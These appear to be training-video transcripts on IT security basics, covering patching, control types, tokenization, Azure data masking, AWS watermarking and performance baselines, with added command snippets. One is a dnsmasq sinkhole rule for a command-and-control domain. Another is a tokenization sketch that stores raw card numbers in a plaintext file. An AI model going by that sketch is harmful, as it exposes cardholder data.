Centralized automation of patching is crucial. So if we are a Windows environment, then we need to have some kind of a centralized way to gather updates and apply them to devices internally on a timely basis, whether that means using Microsoft System Center Configuration Manager or tools like WSUS, Windows Server Update Services. And of course, for other platforms, it's equally important to apply updates as quickly as possible.
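As a hedged example on the Linux side, a Debian or Ubuntu host can be patched from a scheduled script or a configuration-management job using the standard package tools.

# Refresh package metadata and apply available updates (Debian/Ubuntu)
sudo apt-get update && sudo apt-get -y upgrade
# Or, on Red Hat-based systems
sudo dnf -y update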
Then there's the consideration of older or legacy systems that might still be in use. They can present a
challenge when it comes to hardening or applying patches. For example, if we've got end-of-life hardware or
software products, there may no longer be updates that are supplied by the vendor. That is a security risk. We
might still be forced to use an older custom legacy system until a new one is built, such as a line-of-business
piece of software. So those can be tricky to secure.
One way to secure some of those items is to place them on an isolated network and allow only VPN access to
them where possible. We might have proprietary systems still in use. That kind of feeds back into legacy if it's
an older proprietary system that's out of date. Proprietary systems are a little more complex because they're not
standard off-the-shelf solutions. And so there usually needs to be a bit more effort in mitigating risks against
those proprietary systems.
The purpose of the memorandum of agreement or memorandum of understanding, whichever term you prefer,
is so that we have a clearly defined set of security expectations for all involved parties. And this might be
something that would be crucial in some cases for contracts to be awarded, such as between a government
agency and outside contractors where security is a big priority. So this is also related to security in the supply
chain.
For example, if there's a military contract and outside contractors are used, then the military would have to
think about the outside contractors as being part of the supply chain and a potential risk because it's something
that's outsourced. And so the memorandum of understanding can basically establish clear rules of engagement
when it comes to security.
One crucial aspect of hardening an IT environment is applying patches to both firmware and software. At the
firmware level, we're talking about user devices – things like smartphones, tablets, laptops, desktops. Then
there are printing devices; network infrastructure equipment like routers, switches, and storage controllers; and an entire array of IoT devices, some of which might support updating of the firmware. Some, of course, do not, in which case they should be isolated on their own network segment for security reasons.
Software patching would include applying updates to operating systems; software components such as
libraries, database drivers, hardware device drivers; and, of course, applying updates to apps running within the
operating system.
Now when we think about our strategy for hardening through patching of firmware and software, there are a
number of things that we have to be able to answer such as which devices do we have out on the network; how
many devices are there on the network; what are their specific makes, models, and what's the version number
of the existing firmware; how many devices are non-compliant with security patch baselines that we might
have configured; how many patch deployments that we have scheduled or manually invoked have succeeded
or failed.
So we need a way to inventory hardware and software to determine what versions they are running, what
patches are already applied. And then we need to have a security baseline that we then apply to send those
updates out. And then we have to have a way of knowing whether that worked or not. So there are plenty of centralized enterprise-class patching tools, examples of which include Windows Server Update Services,
or WSUS; Microsoft System Center Configuration Manager, SCCM; and on the mobile device side, using a
mobile device management, or MDM, tool. [Video description begins] Windows Server Update Services has
been abbreviated to WSUS. [Video description ends]
In this video, find out how to discuss the various categories of security controls.
Objectives
[Video description begins] Topic title: Security Controls. Your host for this session is Dan Lachance. [Video
description ends]
Security controls are all about reducing the impact of risk; so in other words, risk mitigation. Security controls
map to security requirements, otherwise called control objectives. And security controls can be put in place
manually or they can be triggered automatically.
There are different categories of controls such as preventative and detective. On the preventative security
control side, examples would include employee background checks; user training; data backups; configuring
firewall access control lists, or ACLs; job rotation – moving employees into different job roles
periodically. [Video description begins] The slide indicates that preventive is one of the categories of security
controls. [Video description ends] Not only does that expand the knowledge base and experience of
employees, but it also allows someone currently fulfilling a role to perhaps notice any previous anomalies.
Putting locks on doors is a preventative measure at the physical security level; and the use of security guards.
All of these are designed to prevent security incidents from occurring. Detective security controls include the
periodic review of log files to detect any indicators of compromise; the use of intrusion detection systems, or
IDSs; alarm systems. Job rotation also falls into detective as well as preventive. So do security guards. So there
is a bit of overlap between these items.
So we've got some things here like employee background checks, which are administrative controls, and then
we've got some more technical-based controls such as intrusion detection systems. But there are other
categories such as corrective and recovery and deterrent controls. An example of a corrective or recovery type
of control would be to restore a system or data to a functional state, so data restoration, reimaging a failed
server, patching a vulnerable host.
A deterrent security control might come in the form of perimeter fencing around a property; having lighting,
for example, in a parking lot or around building entrances; signage warning of camera surveillance; video
surveillance cameras actually being used. Security guards can also be considered a deterrent security control.
So here we have some examples of physical controls like perimeter fencing and lighting as an example.
Then we've got compensating controls. A compensating security control is an alternative or a second choice to a primary control. But why wouldn't you just use your first choice, the primary control that addresses threat mitigation? Well, one of the reasons is that it might be cost prohibitive – too expensive.
It might be too complex to implement within a reasonable time frame. So examples of this might include
segregation of duties. Now this means that we don't have a single employee handling an entire business
process from beginning to end, especially when money is involved. It could also include network isolation for
legacy devices that might not support password complexity requirements. So these compensate by applying
some other alternative that reduces the impact of the threat.
So control objectives and controls are commonly stated in security documentation. An example of a control objective might be that no more than two hours of data can be lost. So the control to address that might be to back up data every 1.5 hours. As another example, a control objective might be to ensure that users
have an awareness of the latest social engineering threats. And a control might be monthly or quarterly lunch
and learn sessions.
Now this would be important because a lack of user awareness of social engineering threats could lead to users clicking on things that would infect their computers. And that malware might reach out to the Internet, to command-and-control servers. Those connections could be mitigated with things like DNS sinkholing, essentially returning false DNS query results to malware so it can't talk to command-and-control servers. But nonetheless, there are things that we can do ahead of time to try to keep that from happening.
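As a minimal sketch of DNS sinkholing, a resolver such as dnsmasq can be told to answer queries for a known command-and-control domain with a harmless address. The domain name below is purely hypothetical.

# Add a sinkhole entry so the (hypothetical) malicious domain resolves to 0.0.0.0
echo 'address=/c2.malicious-example.test/0.0.0.0' | sudo tee -a /etc/dnsmasq.conf
# Reload the resolver so the sinkhole takes effect
sudo systemctl restart dnsmasq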
The next control objective – financial spreadsheet user accountability. So the control to address that could be
the use of separate user accounts when accessing those spreadsheets and then auditing file system access to
those files. A control objective might come in the form of encryption of personally identifiable information, or
PII. So the control to do that would be to force PII storage on Windows BitLocker disk volumes in a Windows
environment.
If the control objective states that high importance e-mail messages must be proven to be authentic, then the
control would be to use e-mail digital signatures. If the control objective is to ensure that accurate migration of
data between systems occurs, the control to deal with that might be to use a standardized format such as XML.
Another example of a security control is data tokenization. In our example in the upper left, we've got a user
with a credit card number and an expiry date and also the CVC unique code on the card. So by passing that
information into a trusted tokenization service, we end up with a unique token. So it maps sensitive data to the
token. So we see the token on the right results in a unique value – in this case, 4732916.
So what can happen then is for financial transactions that might require credit card payment, as long as those
merchants trust the tokenization service, then the token can be used as an acceptable form of credit card
payments. So it's a way to protect the original sensitive information, so it doesn't get passed around to all kinds
of different websites, for example, that require credit card payments.
The other thing to think about is that data tokenization is considered secure because it's irreversible. There's
always a unique token, such as per retailer. The sensitive original data, in our case, the credit card number and
the expiry date, that kind of thing is never sent over the network; only the token is. The sensitive data itself
isn't stored on end user devices like a smartphone. However, the token is stored on the user device.
But again, because the token is irreversible, that does not present a security risk. So there are plenty of
different types of security controls at many different levels that can be applied to secure data. [Video
description begins] The following information is displayed on screen: Digital tokens are stored on user
devices. [Video description ends]
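To make that flow concrete, here is a purely conceptual sketch of what a tokenization service does internally: issue a random token that is not derived from the card data, and keep the mapping only in its own vault. The card number is a well-known test value and the vault path is hypothetical; this is not a production design.

# Conceptual tokenization sketch (illustrative only)
CARD_NUMBER="4111111111111111"   # well-known test card number, not real data
TOKEN=$(openssl rand -hex 8)     # random token; not derived from the card, so it can't be reversed
# Only the tokenization service keeps the mapping, inside its own protected vault (hypothetical path)
echo "$TOKEN $CARD_NUMBER" >> /secure/vault/token-map.txt
# Merchants and user devices only ever see and store the token
echo "Token issued: $TOKEN"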
Upon completion of this video, you will be able to recognize the components of organizational security
policies.
Objectives
[Video description begins] Topic title: Organizational Security Policies. Your host for this session is Dan
Lachance. [Video description ends]
Organizations and government agencies have a series of security policies that are designed to protect assets as
long as those policies are adhered to and enforced. This would protect business processes and data assets, such as through the encryption of personally identifiable information. And this might be required to remain compliant with applicable laws and regulations. It can also be related to incident response plans: having organizational security policies in place to protect assets helps make sure that the incident response will be effective when a security incident does occur.
So risk management is a part of organizational security policies as well. Risk management begins with
identifying assets and periodically reviewing assets and their threats because that can change over time, just
like a security control can. A security control that might have been adequate in protecting an asset at one point
in time may no longer be considered adequate in protecting that asset at the next periodic review. And so either
the entire control might need to be replaced or it might need to be reconfigured.
Either way, that can have an impact on organizational security policies whereby, for example, if we have to
replace a VPN solution with something completely different, that might also affect the VPN acceptable use
policy. So it can have an impact on policies, speaking of which, there are many different types of
organizational security policies. [Video description begins] The following information is displayed on screen:
Update organizational security policies. [Video description ends]
There are those that deal with ethics and code of conduct. There are acceptable use policies, or AUPs, of which
there are many types. There might be an acceptable use policy for e-mail, for web browsing, or data
encryption. There might be an acceptable use policy for the VPN. Often, this is part of the user-onboarding
process when people are hired, that they would sign off on these acceptable use policies. There are password-
based policies, data ownership and retention policies often influenced by regulatory compliance, and also
account management policies. There are many others beyond just these, but this is but a small sampling to
think about.
COBIT stands for Control Objectives for Information and Related Technology. Now a control objective is a
security requirement, an assertion that something must be secured. The control put in place deals with how that
objective is dealt with. So this is really an IT governance framework for businesses. So we said the control
objective is basically an assertion about security control requirements and the control is the implemented
solution to mitigate those threats.
Dynamic data masking is a security mechanism that you can apply, for example, when users are pulling up
sensitive information on their screens. A good example of this would be things like credit card numbers where
you might want to mask the entire thing other than the last four digits, or maybe masking parts of an e-mail
address or anything else that might be considered sensitive. And usually this means we're doing this in
alignment with regulatory compliance.
So let's take a look at how we might apply dynamic data masking to a SQL database running in the Microsoft
Azure cloud. [Video description begins] The home page of Microsoft Azure is open. It includes a "Recent
resources" section, which contains a table with the following columns: Name, Type, and Last Viewed. A few
resources, including a db173 (srv172/db173) link with Type listed as SQL database, appear in the
table. [Video description ends] I've already got a Microsoft Azure account.
And I've already deployed a Microsoft SQL database. And the database is using some sample data. So I'm
going to go ahead here and click on my database, db173, to pull up its properties. [Video description begins] A
db173 (srv172/db173) page opens. It has the following categories in the navigation pane: Overview, Power
Platform, Security, etc. The Security category, which is expanded, includes a "Dynamic Data Masking"
subcategory. [Video description ends]
So on the left-hand navigator, what I need to do is scroll down under the Security section where I can see
Dynamic Data Masking.
[Video description begins] With the presenter selecting the "Dynamic Data Masking" subcategory, the
corresponding view includes a "Save" button and a "Masking rules" table with the following columns: Mask
name and Mask Function. The table displays the message: You haven't created any masking rules. The
subcategory also includes a "Recommended fields to mask" table with the following columns: Schema, Table,
and Column. Several schemata, each featuring an associated "Add mask" button, appear in the table. These
include a few SalesLT schemata with Table listed as Customer. [Video description ends]
Now it automatically has recommendations for which fields I may want to mask. So it's picking up that I have
a Customer table and it's also picking up all of the different columns. So for example, maybe I want to add a
mask for the EmailAddress field and anything else that I might deem as being sensitive information. [Video
description begins] He clicks the "Add mask" button associated with a record having Schema listed as
SalesLT, Table listed as Customer, and Column listed as EmailAddress. [Video description ends]
So I'm going to scroll back up. Now we can see that the customer e-mail address field has been added up here
because we clicked add the mask down below. [Video description begins] A SalesLT_Customer_EmailAddress
mask name with Mask Function listed as Default value (0, xxxx, 01-01-1900) appears in the "Masking rules"
table. [Video description ends]
And if I click on the e-mail address up here in the Masking rules section, I can determine how I want it
masked. [Video description begins] An "Edit Mask Rule" pane appears. It includes a "Masking field format"
drop-down list. He expands the list to reveal a few options, including Credit card value (xxxx-xxxx-xxxx-1234)
and Email ([email protected]). [Video description ends]
Notice, there are some presets for credit card number masking. That doesn't apply here. E-mail address
masking does. I'm going to go ahead and select that and click Update. And then when I click the X to close that
little screen, we can now see that the masking function reflects my latest selection. So at this point, we would
click the Save button to put that into effect. Now bear in mind that when you're using Microsoft SQL Database
dynamic data masking, any SQL user that has administrative-level privileges will be excluded from the mask.
So in other words, they would see everything.
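The same kind of masking rule can also be applied with T-SQL rather than the portal. As a hedged sketch, assuming the sample SalesLT schema shown here and a sqlcmd connection to this demonstration's server, something like the following would add an email mask; the login details are placeholders, so confirm the exact syntax and credentials for your environment.

# Apply a dynamic data mask to the EmailAddress column via sqlcmd (placeholder credentials)
sqlcmd -S srv172.database.windows.net -d db173 -U sqladmin -P '<password>' -Q \
  "ALTER TABLE SalesLT.Customer ALTER COLUMN EmailAddress ADD MASKED WITH (FUNCTION = 'email()');"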
In this video, find out how to enable watermarks in Amazon Web Services with Elastic Transcoder.
Objectives
[Video description begins] Topic title: Cloud Digital Rights Management. Your host for this session is Dan
Lachance. [Video description ends]
Intellectual property, or IP, is essentially any creative work that can be protected, for example, by a traditional
copyright. It might be a piece of music. It could be a specific and unique industrial process. Whatever it is, in
the digital world, it can be protected using digital rights management, or DRM. The simplest implementation
of this is probably to embed a watermark in digital media, which we're going to do in this example. The
watermark allows us to help prevent piracy of media.
[Video description begins] The AWS Management Console tab and the S3 Management Console tab display.
The S3 Management Console tab is selected and displays a bucketyyz page. The page contains the following
tabs: Overview, Properties, Permissions, etc. The "Overview" tab, which is selected, includes a table with the
following columns: Name, Last modified, Size, etc. A "Vids" link and a "logo.jpg" link are listed in the
table. [Video description ends]
So we get started here in Amazon Web Services in the S3 Management Console where I've opened up a
bucket, a storage bucket, in the cloud called bucketyyz. In it, I've got a logo file. If I click and open up that
logo file, it's just a fake logo. But I want to embed this as the watermark on a video. [Video description
begins] When the presenter clicks the "logo.jpg" link, a "logo.jpg" page opens. It contains the following tabs:
Overview, Properties, Permissions, etc. The Overview tab, which is selected, includes an "Open" button. And
when he clicks the button, the file opens in a new tab. [Video description ends]
Now if we go back into the bucket, I've also got a folder called Vids with a video called Demo_Video. And it's
a WMV file. [Video description begins] When he clicks the "Vids" link, the corresponding page that opens
includes a table with the following columns: Name, Last modified, Size, etc. A Demo_Video.wmv link is listed
in the table. [Video description ends] So what we're going to do and I'm just going to switch over here to the
AWS Management Console, the main screen. [Video description begins] The home page includes a "Find
Services" Search box. [Video description ends]
I'm going to search for transcoder because the Elastic Transcoder service is designed for rendering media from
one type to another while doing things such as embedding watermarks. [Video description begins] When he
types "transcoder" in the "Find Services" Search box, the following result displays: Elastic Transcoder. And
when he selects it, the corresponding page that opens has the following categories in the navigation pane:
Pipelines, Jobs, and Presets. Currently, Pipelines is selected. It includes two buttons: Create New Pipeline
and Create New Job. [Video description ends]
I'm going to create a pipeline. A pipeline is essentially the conduit into which we feed rendering jobs. I'm
going to call this pipeline2. [Video description begins] When he clicks the "Create New Pipeline" button, the
corresponding page that opens includes a "Pipeline Name" field, an "Input Bucket" field, and the following
sections: Configuration for Amazon S3 Bucket for Transcoded Files and Playlists and Configuration for
Amazon S3 Bucket for Thumbnails. Each of the two sections includes a "Bucket" field and a "Storage Class"
drop-down list. He types "pipeline2" in the "Pipeline Name" field. [Video description ends]
And the input bucket here where we're going to retrieve items that will be rendered is going to be
bucketyyz. [Video description begins] He clicks in the "Input Bucket" field and a list opens. It includes the
bucketyyz option, which he selects. [Video description ends] And if I scroll down below, the output bucket, it's
going to be the same. It doesn't have to be but it can be. And for the Storage Class, I'll just choose
Standard. [Video description begins] He similarly selects the bucketyyz option in the "Bucket" field that
displays in the "Configuration for Amazon S3 Bucket for Transcoded Files and Playlists" section. [Video
description ends]
I don't need to reduce the redundancy, the number of copies that are stored. [Video description begins] He
expands the "Storage Class" drop-down list to reveal the following options: Standard and Reduced
Redundancy. He selects the first option. [Video description ends] And same for thumbnails. If we generate
thumbnails, then we can also specify the storage location and the storage class. [Video description begins] In
the "Configuration for Amazon S3 Bucket for Thumbnails" section, he selects the bucketyyz option in the
"Bucket" field and the Standard option from the "Storage Class" drop-down list. [Video description ends]
So I've done these things. I'm going to go ahead and click Create Pipeline. Then I'm going to click Create New
Job. And I'll put this in pipeline2.
[Video description begins] A "Create a New Transcoding Job" page that opens includes a "Pipeline" drop-
down list, an "Output Key Prefix" field, an "Input Details (1 of 1)" section, and an "Output Details (1 of 1)"
section. The "Input Details (1 of 1)" section includes an "Input Key" field. The "Output Details (1 of 1)"
section contains a "Preset" drop-down list, an "Output Key" field, and the following headings: Encryption
Parameters and Available Settings. He selects the "pipeline2" option from the "Pipeline" drop-down
list. [Video description ends]
Then I have to specify the output key prefix. This just serves as a prefix that the transcoder service will add at
the beginning of names of files that are rendered. But I don't want to do that. So for Input Key, I'm going to go
under Vids and choose Demo_Video. [Video description begins] He selects the Vids/Demo_Video.wmv option
from the "Input Key" field. [Video description ends]
And as I scroll down, there's just a few other options here. The preset here, it's currently a WMV. How about
we choose a preset for iPhone 4S?
[Video description begins] In the "Output Details" section, when he selects the System preset iPhone4S option
from the "Preset" drop-down list, a "Create Thumbnails" heading and an "Output Rotation (Clockwise)" drop-
down list display below the "Output Key" field. Also, a "Watermarks" section displays below the "Output
Details (1 of 1)" section. The "Create Thumbnails" heading has two options: No and Yes. Currently, No is
selected. The "Watermarks" section contains a Preset Watermark Id drop-down list. [Video description ends]
And the output key is going to be the name of the rendered file. So how about we simply call it Demo_Video.
And we see here there's a little hint. The recommendation is to use the .mp4 extension, which we will certainly
do in this case. And as we go further down, I'm going to choose my logo file. The watermark could be placed in any position within our video media clip. I'm going to choose TopLeft here, and I'm going to specify our logo file for that. And maybe while we're at
it, I'll tell it that, yes, I do want to create thumbnails. [Video description begins] When he selects the "TopLeft"
option from the Preset Watermark Id drop-down list, the options that display below the list include an "Input
Key for Preset Watermark Id TopLeft" field. He selects the following lone option in the field: logo.jpg. [Video
description ends]
And for the thumbnail filename pattern prefix, maybe what we'll do is use Demo_Video. We get a sense down
below of what the thumbnail file nomenclature will look like.
[Video description begins] In the "Output Details" section, when he selects the "Yes" option that displays against the "Create Thumbnails" heading, the options that display below the heading include a "Thumbnail Filename Pattern" field and a "Thumbnail Filename Preview" heading. And when he types Demo_Video in the "Thumbnail Filename Pattern" field, the following text displays against the "Thumbnail Filename Preview" heading: Demo_Video-00001.png. [Video description ends]
So now that I've got this all defined in the job, I'm going to click Create New Job. And I'm just going to go
back to Jobs. [Video description begins] The application returns to the page that has the following categories
in the navigation pane: Pipelines, Jobs, and Presets. And with the Jobs category being selected, the
corresponding view includes a "Search" button and a "Pipeline ID" drop-down list. [Video description ends]
And I'm going to specify pipeline2. And I'm going to choose Search. [Video description begins] He selects the
"pipeline2" option from the "Pipeline ID" drop-down list. The "Jobs" category now includes a refresh button
and an associated table with the following columns: ID, First Input Key, Status, etc. The
Vids/Demo_Video.wmv input key appears in the table. [Video description ends]
So we can see our job has been submitted essentially into the pipeline or queue. And currently it has a status of
Progressing. So I can wait here and keep refreshing until such time that the job status is Completed. Once it's
finished, if we go to S3, we'll see that we've got our source video, Demo_Video.wmv. But we also have our
output video. It's an MP4 file. [Video description begins] The following are among the links now listed in the
table in the "Vids" page: Demo_Video-00002.png, Demo_Video.wmv, and Demo_Video.mp4. [Video
description ends]
And we've got our thumbnails. If I click on the first thumbnail file and open it, we can see it shows a frame of the video with a tiny little logo embedded on it. That's our watermark. So let's go back to Vids.
And why don't we go down and just check out the actual rendered video itself, the MP4. So I'm going to click
on it to open it up. And then I'll click the Open button. We can see the video has started and we've got our
embedded logo or watermark.
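As a side note, the same job could also be submitted programmatically rather than through the console. The following is a minimal sketch using the AWS CLI from PowerShell; it assumes the CLI is installed and configured with credentials, and the pipeline ID, preset ID, and key names shown are placeholders you would replace with the values listed on your own Pipelines and Presets pages.

# Minimal sketch: submit a comparable Elastic Transcoder job from PowerShell
# via the AWS CLI. Pipeline ID, preset ID, and keys below are placeholders.
$jobSpec = @"
{
  "PipelineId": "1111111111111-abcde1",
  "Input": { "Key": "Vids/Demo_Video.wmv" },
  "Outputs": [
    {
      "Key": "Vids/Demo_Video.mp4",
      "PresetId": "1351620000001-100020",
      "ThumbnailPattern": "Vids/Demo_Video-{count}",
      "Watermarks": [
        { "PresetWatermarkId": "TopLeft", "InputKey": "Vids/logo.jpg" }
      ]
    }
  ]
}
"@

# Save the job definition and hand it to the CLI.
$specFile = Join-Path $env:TEMP "transcode-job.json"
Set-Content -Path $specFile -Value $jobSpec -Encoding ascii
aws elastictranscoder create-job --cli-input-json ("file://" + $specFile)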
[Video description begins] Topic title: Baselines. Your host for this session is Dan Lachance. [Video
description ends]
When it comes to IT security, establishing a baseline of normalcy is crucial so that we have an easy way to
identify what is abnormal. And that also applies at the performance level. In this example, we're going to use Windows Server 2019, specifically within the Performance Monitor, to create a data collector set. A data collector set can be scheduled to gather specific performance metrics over time, which is great for establishing a baseline.
So to get started here in Windows Server 2019, from the Start menu, I'm going to search for perf, as in P-E-R-
F, and then I'm going to choose Performance Monitor. We build data collector sets, or DCSs, here within the
Performance Monitor tool. We can see Data Collector Sets listed over here on the left.
[Video description begins] The "Performance Monitor" application that opens includes a toolbar, a
navigation pane, and a content pane. The navigation pane has a "Performance" category, which includes the
following nodes: Data Collector Sets and Reports. And the presenter expands the "Data Collector Sets" node
to reveal, among others, the following nodes: User Defined and System. [Video description ends]
There are some system-defined data collector sets based on what might be configured on this machine
already. [Video description begins] He expands the "System" node to reveal three data collector sets. [Video
description ends]
But we're interested in user-defined data collector sets. So I'm going to right-click on User Defined, choose
New, Data Collector Set. I'm going to call it Establish Performance Baseline. [Video description begins] The
content pane now includes a "Create new Data Collector Set" section. The section displays the following message: How would you like to create this new data collector set?. Next, a "Name" field and the following options display: Create from a template (Recommended) and Create manually (Advanced). Currently, the
"Create from a template (Recommended)" option is selected. [Video description ends]
And I'm going to create it manually. So I'll select that option and I'll click Next. Now what I want to do is use performance counters. [Video description begins] The section now displays the message: What type
of data do you want to include?. Next, the following options display: Create data logs and Performance
Counter Alert. The "Create data logs" option, which is selected, includes a "Performance counter"
checkbox. [Video description ends]
I want to gather some performance metrics on the machine to determine what kind of performance stats are
considered normal for this particular host. And so I'm going to go ahead and click Next. [Video description
begins] He selects the "Performance counter" checkbox. The section now displays the following question:
Which performance counters would you like to log?. Next, a "Performance counters" subsection displays. It
has the following associated buttons: Add... and Remove. And below it is a spin box labeled: Sample interval:
(given as 15). The spin box has an associated "Units" drop-down list, which is set to Seconds. [Video
description ends]
So the next screen asks, which counters are you interested in or which metrics? So I'm going to click Add. So I
can select from the local computer.
[Video description begins] A dialog box appears. It includes two vertical sections: Available counters and
Added counters. The "Available counters" section includes a "Select counters from computer:" drop-down list,
which has an associated "Browse" button. Next, a list comprising several nodes displays. And below that is an
"Instances of selected object:" subsection. The section also includes an "Add" button. The "Added counters"
section has a table with the following columns: Counter, Parent, Instances, and Computer. [Video description
ends]
Of course, I could reach out over the network as well. But I'm interested, let's say, in looking at the Processor object, such as the % Processor Time counter – how busy the processor is. [Video description begins] He expands the "Processor" node in the list in the "Available counters" section to reveal several objects. These include %
Processor Time, which he selects. And the "Instances of selected object:" subsection displays three options:
Total, <All instances>, and 0. Total is selected. [Video description ends]
Now the default instance of that selected object is _Total, in the case of a multiprocessor system. And
that's what I'm interested in. So I'm going to go ahead and add that. And I can also scroll through the list and
select other items I might be interested in looking at. [Video description begins] The "% Processor Time"
object with Instances listed as _Total appears in the table in the "Added counters" section. [Video description
ends]
So for example, I'm going to go to the Ms because I'm interested in looking at memory stats on this particular
host; for example, Committed Bytes In Use. Or maybe I could look at Available Bytes or kilobytes or
megabytes as we can see listed here. So we could select those items and just add them to the list on the
right. [Video description begins] He expands the "Memory" node to reveal, among others, the following
objects: % Committed Bytes In Use, Available Bytes, Available KBytes, and Available MBytes. And when he
selects the Available MBytes object, it appears in the table in the "Added Counters" section. [Video description
ends]
So we will continue selecting the performance metrics of interest that we want to use to establish a baseline.
I'm going to add one more, and that's going to be one of the physical disk counters.
So I'm going to go to the Ps. And I'm going to go all the way down to PhysicalDisk and expand that. And
I'm interested in what's called the average disk queue length. And I want the Total instance of that. So I'll add
that.
Basically, the queue length for the disk subsystem identifies disk I/O requests that couldn't be serviced because
the disk I/O subsystem is already busy and so they get queued up. So a large number of items in a disk queue might be considered bad. I say might because we don't yet know what's normal. In a busy disk read-and-write environment, it's normal to have some items queued up. The question is how many items and for how long. So you'd have to look at that under normal load conditions when performance is acceptable. So having
done this, I'm going to click OK.
[Video description begins] He returns to the "Performance Monitor" application. [Video description ends] I'm
going to have the sample interval, let's say, every five minutes. I'll click Next. [Video description begins] After
typing 5 in the "Sample interval:" spin box, he selects the "Minutes" option from the "Units:" drop-down list.
The "Create new Data Collector Set." section now displays the message: Where would you like the data to be
saved?. And below that is a "Root directory:" field with an associated "Browse..." button. A location displays
in the field. [Video description ends]
That's the default location to save the data. I'm going to accept that. I'll click Next. [Video description
begins] The section now displays the message: Create the data collector set?. The following options, among
others, display below the message: Open properties for this data collector set, Start this data collector set
now, and Save and close. The "Save and close" option is selected. [Video description ends]
And I'm going to open the properties for the data collector set and click Finish because we haven't set a
schedule. So I'm going to click Schedule. I'll click the Add button.
[Video description begins] When he clicks the "Finish" button, an "Establish Performance Baseline
Properties" dialog box appears. It includes the following tabs: General, Directory, Schedule, etc.. General is
selected. When he selects the "Schedule" tab, the corresponding view includes an empty "Schedules:" table
with the following columns: Start, Days, Beginning, and Expires. The table has an associated "Add" button.
And when he clicks it, a "Folder Action" dialog box appears. It includes two sections: Active range and
Launch. The "Active range" section has a "Beginning date:" field and an "Expiration date:" field, each of
which features a calendar icon. The "Beginning date:" field is set to a specific date. The "Expiration date:"
field, which is unavailable, has an associated checkbox, which is clear. The "Launch" section includes a
checkbox associated with each day of the week. All these checkboxes are selected. [Video description ends]
I want it to start today. And I can set an expiration date; let's say, maybe a week later. [Video description
begins] He selects the checkbox associated with the "Expiration date:" field. [Video description ends] So we're
going to capture these performance metrics every five minutes over a one-week period of normal usage of this
host, to establish a normal baseline. And I'm going to click OK and OK. [Video description begins] A
"Performance Monitor" prompt, which includes an "OK" button, appears. [Video description ends]
And I've just popped in the administrative credential. [Video description begins] The application returns to the
"Performance Monitor" view. [Video description ends] So now under User Defined, we now see Establish
Performance Baseline. [Video description begins] He selects the "Establish Performance Baseline" data
collector set. [Video description ends]
Now we could wait for the schedule to kick in. But at any point in time, you can also click the start button up
at the top, which I will do. And if we drill down in the left-hand navigator, under Reports, User Defined, and
there's Establish Performance Baseline. [Video description begins] When he clicks the "Start the Data
Collector Set." button in the toolbar, an "Establish Performance Baseline: Report Status" section opens in the
content pane. It displays a progress bar. [Video description ends]
And if we actually select the hostname – that's the Windows computer name – then, instead of seeing the report results, we see the status of the report: it's still in the midst of collecting data. [Video description
begins] The content pane now includes a line graph, whose horizontal axis is set to a scale of 5 minutes. The
graph displays three lines, representing the % Processor Time counter, the Avg. Disk Queue Length counter,
and, the Available MBytes counter, respectively. Below the line graph, the following fields display: Last,
Average, Minimum, Maximum, and Duration. Next, a table with the following columns displays: Color, Scale,
Counter, etc. The three counters are listed in the table. [Video description ends]
So once the DCS has completed gathering its stats, for example, over a one-week period of normal usage, we
can look at a standard baseline of performance on this particular host. [Video description begins] He points to
the host name which is selected and which displays in the "Reports" node in the navigation pane. [Video
description ends]
So looking at the performance baseline I've selected, we can see it has charted each item, which is shown
down at the bottom in the legend. So for example, the blue item is the amount of memory in the unit of
megabytes. The green line listed up here – I can select that down below and press Ctrl+H to highlight it – is the
average disk queue length. And of course, the red item here is the percent processor time. So we have a sense
of what is normal over a period of time of normal usage. And that is the purpose of this.
Now when you select an item, in this case, processor time, you can see the last measurement taken of CPU utilization and the average, which is only 6.3% or so. You can see the minimum and the maximum values. [Video
description begins] He points to the measurements that populate in each of the fields that display below the
graph. [Video description ends]
So we're interested in looking at the average. If we have too much of a deviation beyond the average, then
there might be something suspicious going on. Or it could be just a peak in demand for the application running
on that server, if that's how it's configured. So normally, when we configure our intrusion detection or security
incident detection tools, we'll configure rules that might look at what the baseline is.
And any significant deviations from the baseline over a period of time might then be configured to trigger an alarm of
some kind. [Video description begins] He points to the measurement that displays in the "Average"
field. [Video description ends]
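For reference, a similar data collector set could also be built from the command line instead of the GUI. Here is a minimal sketch using the built-in logman.exe tool from PowerShell; the counter paths mirror what was selected above, while the output folder is an assumption you would adjust for your host.

# Sketch: create and start a comparable data collector set with logman.exe.
logman create counter "Establish Performance Baseline" `
  -c "\Processor(_Total)\% Processor Time" `
     "\Memory\Available MBytes" `
     "\PhysicalDisk(_Total)\Avg. Disk Queue Length" `
  -si 00:05:00 `
  -o "C:\PerfLogs\Baseline"

# Start collecting now rather than waiting for a schedule.
logman start "Establish Performance Baseline"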
In this video, you will discuss various types of IT security training exercises.
Objectives
[Video description begins] Topic title: Security Training. Your host for this session is Dan Lachance. [Video
description ends]
Security training is one of those things that really needs to be applied at all levels of the organizational
hierarchy – all the way from the employees who perform day-to-day tasks up to the top at the executive level. The team that crafts organizational security policies needs to begin by defining business objectives – what's the overall goal that the organization has, and what objectives would get us to those goals?
And what are the applicable regulations? Because often, industry regulations will have a big impact on
organizational security policies, such as a requirement to retain data for a period of time or a requirement to
encrypt sensitive data. And so the creation and updating of organizational security policies is an ongoing task.
This changes because threats change and, of course, industry regulations change over time.
Now part of security training is going to be making sure that the applicable teams conduct periodic security
drills or tests. That might even come in the form of the organization hiring a penetration testing team. Security
drills come in many forms. There are tabletop exercises. All that this means is essentially it's an informal
meeting where people show up, for example, in a boardroom or virtually through video conferencing, to
discuss issues related to a potential security incident if it were to occur.
Now notes need to be taken because much can be learned from this in terms of where there are gaps: people not knowing what their roles are, for example, or not knowing how to escalate an incident to another party. There
are red teams. Red teams are the offensive technicians that perform attacks – think of hiring penetration testers.
The blue team would be the defensive technicians that maintain the IT systems and security defenses. Think of
that as the internal IT security team. The white team is the team that oversees all of the security drills and tests.
Because security is so prevalent in the media and it's constantly changing, it's important to keep updated on the
newest developments. And so proactive security education is absolutely crucial. But in order for that to work,
there needs to be management buy-in. Management in the organization needs to support security education
because it costs money and it takes time. So, for example, providing paid work time for security education and making sure that the appropriate employees at different levels in the organization are getting trained while still getting paid. It's worth it in the end.
For IT security technicians, it's important to subscribe to the appropriate security mailing lists. For example, if your environment uses Juniper Networks' and Cisco Systems' network infrastructure devices, you should be
subscribing to any security mailing lists related to known vulnerabilities with those items.
It's also important to have a sandbox or testing environment. And this is really easy to do in the cloud and very
inexpensive because you only pay for it when you're using it. So you can shut down virtual machines and
virtual networks and delete them when you don't need them and thus not pay for them. This is a great way to
spin up a testing environment for simulated security scenarios.
